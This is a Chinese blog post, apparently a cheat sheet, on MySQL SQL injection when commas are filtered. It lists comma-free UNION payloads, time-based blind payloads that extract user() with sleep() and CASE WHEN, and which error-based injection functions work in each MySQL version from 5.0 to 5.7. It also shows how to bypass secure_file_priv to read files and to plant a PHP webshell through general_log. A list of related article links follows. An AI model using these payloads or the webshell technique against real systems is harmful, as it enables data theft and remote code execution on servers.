不存在逗号的情况:

联合查询:

1.UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)

盲注:

1.select user,password from user where user='' and (sleep(length(user())=14));

select user,password from user where user='' and  (sleep(ascii(mid(user()from(1)for(1)))=114));

这是第一种,直接执行sleep()函数,但是没办法控制延迟时间,固定为sleep(true) == sleep(1),当网络存在波动的时候,可能会误判。

2.select user,password from user where user='' and (select case when (length(user())=14) then sleep(5) else 0 end);

select user,password from user where user='' and (select case when (substring((select user()) from(1)for(1))='o') then sleep(5) else 0 end);

这是第二种,case when关键字,代替 if 语句。

substring((select user()),1,2) == substring((select user()) from(1)for(2)) :from(1)表示从第一个位置开始,for(2)表示截取两个字符。P.S: mid函数同理。

substring((select user()) from-10) :也可以这样写,表示截取最后10位字符。这可以配合regexp使用正则来使用:substring(user() from-10) regexp '.*host'

报错注入:

测试的数据库版本为:5.0.96-community,5.1.60-community,5.5.29,5.5.53,5.7.26

5.0.96-community下:

@@secure_file_priv 为 NULL,默认不影响读,写文件等操作。

只有 floor( 函数的报错语句可以使用,但是该语句必须要 逗号 。

5.1.60-community下:

@@secure_file_priv 为 NULL,默认不影响 读,写文件等操作。

1.extractValue,updateXML 这两个函数可以开始使用了,具体Mysql版本:>=5.1.5即可使用,但是也必须使用逗号。

  注:该函数每次查询的数据只有32个字符,可以配合substr函数使用。

2.floor导致的报错可以使用。

3.geometrycollection()、multiponint()、polygon()、multipolygon()、linestring()、multilinestring()等函数都可以使用,并且不需要逗号

4.exp函数导致的报错,不能使用。

5.5.29:

@@secure_file_priv 为 NULL,默认不影响 读,写文件等操作。

1.extractValue,updateXML,floor,都可以使用,但是需要逗号。

2..geometrycollection()、multiponint()、polygon()、multipolygon()、linestring()、multilinestring(),exp() 都可以使用,不需要逗号。

5.5.53

@@secure_file_priv 为 NULL,默认 影响 读,写文件等操作。

绕过secure_file_priv 限制进行读写文件:

读文件:

CREATE TABLE `tmp` (`tmp` TEXT NOT NULL );

load data local infile 'D:/5529.txt' into table tmp;   成功将文件内容写入tmp表。

写文件:

set global general_log='on';

SET global general_log_file='D:/cmd.php';

SELECT '<?php assert($_POST["cmd"]);?>';

需要能执行多语句。

1.geometrycollection()、multiponint()、polygon()、multipolygon()、linestring()、multilinestring(),exp()等关键字的报错语句全部失败。

2.extractValue,updateXML,floor,都可以使用,但是需要逗号。

5.7.26

@@secure_file_priv 为 NULL,默认 影响 读,写文件等操作。

绕过secure_file_priv 限制进行读写文件,利用如上5.5.53。

1.geometrycollection()、multiponint()、polygon()、multipolygon()、linestring()、multilinestring(),exp()等关键字的报错语句全部失败。

2.extractValue,updateXML,都可以使用,但是需要逗号。

3.新增的报错语句:select ST_LatFromGeoHash(user());select ST_LongFromGeoHash(user());select ST_PointFromGeoHash(user(),1);select GTID_SUBSET(user(),1);

4.floor的报错语句,在5.7版本中与之前的有一些不一样。也就是使用 and 还是 or 连接符的结果不一样。也就是:

(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) 必须要能执行。见图:

文章持续更新...

Mysql 不能使用逗号的情况的更多相关文章

  1. mysql如何查看索引使用情况以及优化 - guols0612

    mysql中支持hash和btree索引.innodb和myisam只支持btree索引,而memory和heap存储引擎可以支持hash和btree索引 我们可以通过下面语句查询当前索引使用情况: ...

  2. MySQL删除数据几种情况以及是否释放磁盘空间【转】

    MySQL删除数据几种情况以及是否释放磁盘空间: 1.drop table table_name 立刻释放磁盘空间 ,不管是 Innodb和MyISAM ; 2.truncate table tabl ...

  3. mysql字段按逗号,拆分并按条件查找

    mysql字段按逗号,拆分并按条件查找 mysql 表结构 CREATE TABLE `subid` ( `id1` varchar(255) DEFAULT NULL, `id2` varchar( ...

  4. 逗号分割符--字段中含逗号等情况的解析方法Java实现

    最近在处理文本字符串时,没一行数据都是按照逗号分割的,每个字段值一般情况是带有双引号的,但是有的字段值里面还包含逗号,甚至有的字段就没有双引号,这个分割起来就有点麻烦了 下面说一下我解决方法,如果谁有 ...

  5. 基于binlog来分析mysql的行记录修改情况(python脚本分析)

          最近写完mysql flashback,突然发现还有有这种使用场景:有些情况下,可能会统计在某个时间段内,MySQL修改了多少数据量?发生了多少事务?主要是哪些表格发生变动?变动的数量是怎 ...

  6. MYSQL 索引类型、什么情况下用不上索引、什么情况下不推荐使用索引

    mysql explain的使用: http://blog.csdn.net/kaka1121/article/details/53394426 索引类型 在数据库表中,对字段建立索引可以大大提高查询 ...

  7. Linux下MySQL在知道密码的情况下修改密码

    1.在知道原密码的情况下,进入MySQL: mysql -u root -p 2.进入 mysql数据库,然后通过语句修改密码: 我的MySQL版本是:mysql  Ver 14.14 Distrib ...

  8. mysql replace into 的使用情况

    replace into的存在的几种情况 当表存在主键并且存在唯一键的时候 如果只是主键冲突 mysql> select * from auto; +----+---+------+------ ...

  9. mysql与redis在各种情况下性能对比

    数据表结构 CREATE TABLE `jx_goods_test` ( `id` int(11) NOT NULL AUTO_INCREMENT, `goods_name` varchar(100) ...

随机推荐

  1. 【Java并发编程】阿里最喜欢问的几道线程池的面试题?

    引言 上一篇文章我们有介绍过线程池的一个基本执行流程<[Java并发编程]面试必备之线程池>以及它的7个核心参数,以及每个参数的作用.以及如何去使用线程池 还留了几个小问题..建议看这篇文 ...

  2. git使用下

    Git 内部工作原理 Git 本质上是一个内容寻址文件系统,最初是一套面向版本控制系统的工具集,而不是一个完整的用户友好的版本控制系统.因此它还包含了一些用于完成底层工作的命令,这些命令被称为&quo ...

  3. [LeetCode]501. Find Mode in Binary Search Tree二叉搜索树寻找众数

    这次是二叉搜索树的遍历 感觉只要和二叉搜索树的题目,都要用到一个重要性质: 中序遍历二叉搜索树的结果是一个递增序列: 而且要注意,在递归遍历树的时候,有些参数如果是要随递归不断更新(也就是如果递归返回 ...

  4. 各开源协议BSD、Apache Licence 2.0、GPL

    以下是上述协议的简单介绍:BSD开源协议BSD开源协议是一个给于使用者很大自由的协议.基本上使用者可以"为所欲为",可以自由的使用,修改源代码,也可以将修改后的代码作为开源或者专有 ...

  5. sqlite嵌入式数据库简介及特性

    p.p1 { margin: 0; font: 12px "Helvetica Neue"; color: rgba(69, 69, 69, 1) } p.p2 { margin: ...

  6. ES快速开发,ElasticsearchRestTemplate基本使用以及ELK快速部署

    最近博主有一些elasticsearch的工作,所以更新的慢了些,现在就教大家快速入门,并对一些基本的查询.更新需求做一下示例,废话不多说开始: 1. ES快速上手 es下载:[https://ela ...

  7. Golang字符串是否存在于切片或数组中的小工具(基本等同于python in语法)

    // golang中是没有判断字符串是否存在数组或切片里的内置方法, 所以我们可以自己搞一个快速小组件 func Find(slice []string, val string) (int, bool ...

  8. 剑指offer 面试题2:实现Singleton模式

    转自:https://blog.csdn.net/liang19890820/article/details/61615495 Singleton 的头文件(懒汉式/饿汉式公用): // single ...

  9. Selenium WebDriver 定位之Xpath定位

    Selenium 定位之Xpath定位: 1.绝对路径定位:以/开头从根节点一直找到当前节点,不推荐使用决定路径定位方式 2.相对路径定位:使用"//"表示相对路径定位,格式:// ...

  10. 通过trace分析优化其如何选择执行计划

    mysql5.6提供了对sql的跟踪trace,通过trace文件能够进一步了解为什么优化其选择执行计划a而不选b执行计划,帮助我们更好的理解优化其的行为. 使用方式:首先打开trace,设置格式为j ...